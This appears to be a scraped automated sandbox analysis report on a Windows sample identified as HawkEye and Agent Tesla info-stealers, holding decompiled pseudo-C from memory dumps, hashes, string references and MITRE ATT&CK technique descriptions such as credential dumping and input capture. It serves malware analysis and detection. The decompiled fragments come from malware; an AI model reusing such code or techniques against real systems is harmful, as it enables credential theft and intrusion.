				_t26 = _t60 + 0x64c; // 0x64c
				 *((intOrPtr*)(__edi + 0x640)) = 0x412e80;
				E001B3549(_t26);
				 *((intOrPtr*)(__edi + 0x858)) = 0x413144;
				 *((intOrPtr*)(__edi + 0x86c)) = 0x4130f0;
				_t30 = _t60 + 0x870; // 0x870
				_t53 = _t30;
				 *_t53 = 0x4130f0;
				_t31 = _t60 + 0x878; // 0x878
				_t59 = _t31;
				 *_t59 = 0x413144;
				 *_t53 = 0x412f34;
				_t32 = _t60 + 0x87c; // 0x87c
				_t54 = _t32;
				 *__edi = 0x412e98;
				 *((intOrPtr*)(__edi + 0x1c8)) = 0x412f1c;
				 *((intOrPtr*)(__edi + 0x1e0)) = 0x413760;
				 *((intOrPtr*)(__edi + 0x640)) = 0x412f24;
				 *((intOrPtr*)(__edi + 0x858)) = 0x412f2c;
				 *((intOrPtr*)(__edi + 0x86c)) = 0x412f30;
				 *_t59 = 0x412f38;
				_t38 = _t60 + 0x890; // 0x890
				 *_t54 = 0x413bd8;
				 *((intOrPtr*)(_t54 + 8)) = 0;
				 *((intOrPtr*)(_t54 + 0x10)) = 0;
				 *((intOrPtr*)(_t54 + 4)) = 0;
				 *((intOrPtr*)(_t54 + 0xc)) = 0;
				E001B3549(_t38);
				 *((char*)(__edi + 0xb20)) = 0;
				 *((char*)(__edi + 0xc25)) = 0;
				 *((char*)(__edi + 0xd2a)) = 0;
				 *((char*)(__edi + 0xe2f)) = 0;
				 *((char*)(__edi + 0xa9c)) = 0;
				return __edi;
			}

0x001b2e88
0x001b2e8c
0x001b2e93
0x001b2e99
0x001b2e9f
0x001b2ea5
0x001b2eab
0x001b2eab
0x001b2eb6
0x001b2ebc
0x001b2ec2
0x001b2ec5
0x001b2ec8
0x001b2ecb
0x001b2ece
0x001b2ed1
0x001b2ed7
0x001b2ee1
0x001b2ee1
0x001b2ee7
0x001b2eea
0x001b2eed
0x001b2ef0
0x001b2ef3
0x001b2ef6
0x001b2ef9
0x001b2efc
0x001b2efe
0x001b2efe
0x001b2f04
0x001b2f0b
0x001b2f0d
0x001b2f10
0x001b2f13
0x001b2f19
0x001b2f1f
0x001b2f29
0x001b2f2e
0x001b2f38
0x001b2f42
0x001b2f42
0x001b2f48
0x001b2f4e
0x001b2f4e
0x001b2f54
0x001b2f5a
0x001b2f60
0x001b2f60
0x001b2f66
0x001b2f6c
0x001b2f76
0x001b2f80
0x001b2f8a
0x001b2f94
0x001b2f9e
0x001b2fa4
0x001b2faa
0x001b2fb0
0x001b2fb3
0x001b2fb6
0x001b2fb9
0x001b2fbc
0x001b2fc1
0x001b2fc7
0x001b2fcd
0x001b2fd3
0x001b2fda
0x001b2fe3

Strings

,/A, xrefs: 001B2F8A
`7A, xrefs: 001B2F76
0/A, xrefs: 001B2F94
X7A, xrefs: 001B2ED7
$/A, xrefs: 001B2F80

Memory Dump Source

Source File: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000A.00000002.323770575.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.323942362.00000000001D2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $/A$,/A$0/A$X7A$`7A
API String ID: 0-851144607
Opcode ID: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
Instruction ID: 6ef7e0f07010ece681e73d9a19149ac0a91c2d97e0ae903907a8dca6ffb7932d
Opcode Fuzzy Hash: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
Instruction Fuzzy Hash: 104182B0655642EFC3098F2AC5846C1FBE0BB09314F95C2AFC46C9B221C7B4A565CF98

Uniqueness

Uniqueness Score: -1.00%

Function 001B3021, Relevance: 6.3, Strings: 5, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001B3021(intOrPtr* __esi) {
				void* __edi;
				intOrPtr* _t20;
				void* _t24;

				_t20 = __esi + 0x878;
				 *__esi = 0x412e98;
				 *((intOrPtr*)(__esi + 0x1c8)) = 0x412f1c;
				 *((intOrPtr*)(__esi + 0x1e0)) = 0x413760;
				 *((intOrPtr*)(__esi + 0x640)) = 0x412f24;
				 *((intOrPtr*)(__esi + 0x858)) = 0x412f2c;
				 *((intOrPtr*)(__esi + 0x86c)) = 0x412f30;
				 *((intOrPtr*)(__esi + 0x870)) = 0x412f34;
				 *_t20 = 0x412f38;
				E001B3663(__esi + 0x890);
				 *((intOrPtr*)(__esi + 0x87c)) = 0x413bd8;
				E001BD71D(__esi + 0x87c);
				 *_t20 = 0x413144;
				 *((intOrPtr*)(__esi + 0x870)) = 0x4130f0;
				E001B3663(__esi + 0x64c);
				E001B2FE4(__esi + 0x1c8, _t24);
				return E001B744A(__esi);
			}

0x001b3029
0x001b3035
0x001b303b
0x001b3041
0x001b304b
0x001b3055
0x001b305f
0x001b3069
0x001b3073
0x001b3079
0x001b3084
0x001b308a
0x001b308f
0x001b309b
0x001b30a5
0x001b30aa
0x001b30b8

Strings

$/A, xrefs: 001B304B
`7A, xrefs: 001B3041
,/A, xrefs: 001B3055
4/A, xrefs: 001B3069
0/A, xrefs: 001B305F

Memory Dump Source

Source File: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000A.00000002.323770575.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.323942362.00000000001D2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $/A$,/A$0/A$4/A$`7A
API String ID: 0-2435369464
Opcode ID: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
Instruction ID: 9960b2b21b423926052b2fa612feb799c375741af93085eabffd658457c5afaa
Opcode Fuzzy Hash: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
Instruction Fuzzy Hash: 9F01BBB4004B45CAD721EF24C5446C6BBF4FB45305F50C90EE4AA5B204DBB4A29ADF59

Uniqueness

Uniqueness Score: -1.00%

Function 00179829, Relevance: 5.2, Strings: 4, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00179829(intOrPtr _a4, signed char* _a8, intOrPtr _a12, char _a16, signed int* _a20) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				void* __edi;
				void* __esi;
				signed int _t66;
				void* _t70;
				intOrPtr _t71;
				signed int _t74;
				signed int _t84;
				void* _t85;
				signed int _t94;
				signed int* _t95;
				signed int _t96;
				signed int* _t97;
				signed char* _t100;
				signed int _t101;
				signed char _t104;
				signed char* _t136;
				intOrPtr _t140;

				_t136 = _a8;
				_v20 = 0;
				_v8 = 0;
				_v12 = 1;
				_v16 = 0x4435dc;
				if(_t136 != 0) {
					_t101 =  *_t136 & 0x000000ff;
					if(_t101 == 0x84) {
						_t101 = _t136[0x23] & 0x000000ff;
					}
					if(_t101 != 0x9c) {
						L8:
						if(_t101 == 0x5e || _t101 == 0x82 || _t101 == 0x81) {
							_t140 = _a4;
							_t66 = E0017980E(_t140);
							_v8 = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							if((_t136[2] & 0x00000400) == 0) {
								_push(_t136[4]);
								_t71 = E0016CE3A(0x44a3c8, _v16);
								_v20 = _t71;
								if(_t71 != 0) {
									_t129 = _v8;
									if(_v8 != 0) {
										E001793C1(0x41315e, _t129, _t71, 1);
									}
									if(_t101 == 0x82) {
										 *((char*)(_v8 + 0x1e)) = 2;
									}
									L27:
									if(_t101 == 0x81 || _t101 == 0x82) {
										if(_a16 != 0x62) {
											goto L31;
										}
										_push(0x63);
										goto L32;
									} else {
										L31:
										_push(_a16);
										L32:
										E0017BE00(_v8);
										_t74 = _v8;
										if(( *(_t74 + 0x1c) & 0x0000000c) != 0) {
											 *(_t74 + 0x1c) =  *(_t74 + 0x1c) & 0x0000fffd;
										}
										goto L34;
									}
								}
								goto L22;
							}
							E00179280(_v8, _t136[4] * _v12, _t136[4] * _v12 >> 0x20);
							goto L27;
						} else {
							if(_t101 != 0x9c) {
								if(_t101 != 0x83) {
									L36:
									 *_a20 = _v8;
									goto L37;
								}
								_t140 = _a4;
								_t84 = E0017980E(_t140);
								_v8 = _t84;
								if(_t84 == 0) {
									L22:
									 *((char*)(_t140 + 0x1e)) = 1;
									E0016C16B(_t140, _v20);
									E00179A4C(_v8);
									 *_a20 =  *_a20 & 0x00000000;
									_t70 = 7;
									return _t70;
								}
								_t85 = E0016D157(_t136[4] + 2);
								asm("cdq");
								E001793C1(0x41315e, _v8, E0016D801(_t140, 0x9c, _t136[4] + 2, _t85 - 1), 0);
								L17:
								L34:
								_t108 = _v8;
								if(_v8 != 0) {
									E0017BCAB(_t108);
								}
								goto L36;
							}
							L12:
							if(E00179829(_a4, _t136[8], _a12, _a16,  &_v8) != 0) {
								goto L34;
							}
							E001791BB(_v8);
							_t94 = _v8;
							_t95 = _t94 + 0x10;
							asm("adc edx, 0x0");
							 *_t95 =  ~( *_t95);
							_t95[1] =  ~( *(_t94 + 0x14));
							_t96 = _v8;
							_t97 = _t96 + 8;
							asm("adc edx, 0x0");
							 *_t97 =  ~( *_t97);
							_t97[1] =  ~( *(_t96 + 0xc));
							E0017BE00(_v8, _a16);
							goto L17;
						}
					}
					_t100 = _t136[8];
					_t104 =  *_t100;
					if(_t104 == 0x81 || _t104 == 0x82) {
						_v12 = _v12 | 0xffffffff;
						_t136 = _t100;
						_t101 =  *_t136 & 0x000000ff;
						_v16 = 0x44a3c4;
						goto L8;
					} else {
						goto L12;
					}
				} else {
					 *_a20 = 0;
					L37:
					return 0;
				}
			}

0x00179834
0x00179839
0x0017983c
0x0017983f
0x00179846
0x0017984d
0x00179859
0x00179862
0x00179864
0x00179864
0x0017986f
0x00179890
0x00179893
0x0017996d
0x00179970
0x00179977
0x0017997a
0x00000000
0x00000000
0x00179982
0x00179998
0x001799a3
0x001799ad
0x001799b0
0x001799d4
0x001799d9
0x001799e6
0x001799ec
0x001799f3
0x001799f8
0x001799f8
0x001799fc
0x00179a02
0x00179a10
0x00000000
0x00000000
0x00179a12
0x00000000
0x00179a16
0x00179a16
0x00179a16
0x00179a19
0x00179a1c
0x00179a21
0x00179a29
0x00179a2b
0x00179a2b
0x00000000
0x00179a29
0x00179a02
0x00000000
0x001799b0
0x0017998f
0x00000000
0x001798b1
0x001798b3
0x0017991e
0x00179a3d
0x00179a43
0x00000000
0x00179a43
0x00179924
0x00179927
0x0017992e
0x00179931
0x001799b2
0x001799b5
0x001799ba
0x001799c4
0x001799cc
0x001799d1
0x00000000
0x001799d1
0x0017993a
0x00179944
0x00179961
0x00179967
0x00179a31
0x00179a31
0x00179a36
0x00179a38
0x00179a38
0x00000000
0x00179a36
0x001798b5
0x001798cf
0x00000000
0x00000000
0x001798d8
0x001798dd
0x001798e3
0x001798ed
0x001798f0
0x001798f4
0x001798f7
0x001798fd
0x00179904
0x00179909
0x0017990b
0x00179911
0x00000000
0x00179911
0x00179893
0x00179871
0x00179874
0x00179879
0x00179880
0x00179884
0x00179886
0x00179889
0x00000000
0x00000000
0x00000000
0x00000000
0x0017984f
0x00179852
0x00179a45
0x00000000
0x00179a45

Strings

b, xrefs: 00179A0C
^1A, xrefs: 001799DE
^1A, xrefs: 0017995A
^, xrefs: 00179890

Memory Dump Source

Source File: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000A.00000002.323770575.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.323942362.00000000001D2000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ^$^1A$^1A$b
API String ID: 0-1727528133
Opcode ID: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
Instruction ID: 692b88eae69c2e1a11fc38b7e177f20aa8c2c8a2de9e296cf819b057d622b57e
Opcode Fuzzy Hash: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
Instruction Fuzzy Hash: 0261E471A00205EFEF14CF68C881BADBBB1EF55310F24C159E818AB292D731DE54CB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report B6LNCKjOGt5EmFQ.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: HawkEye

Threatname: Agenttesla

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre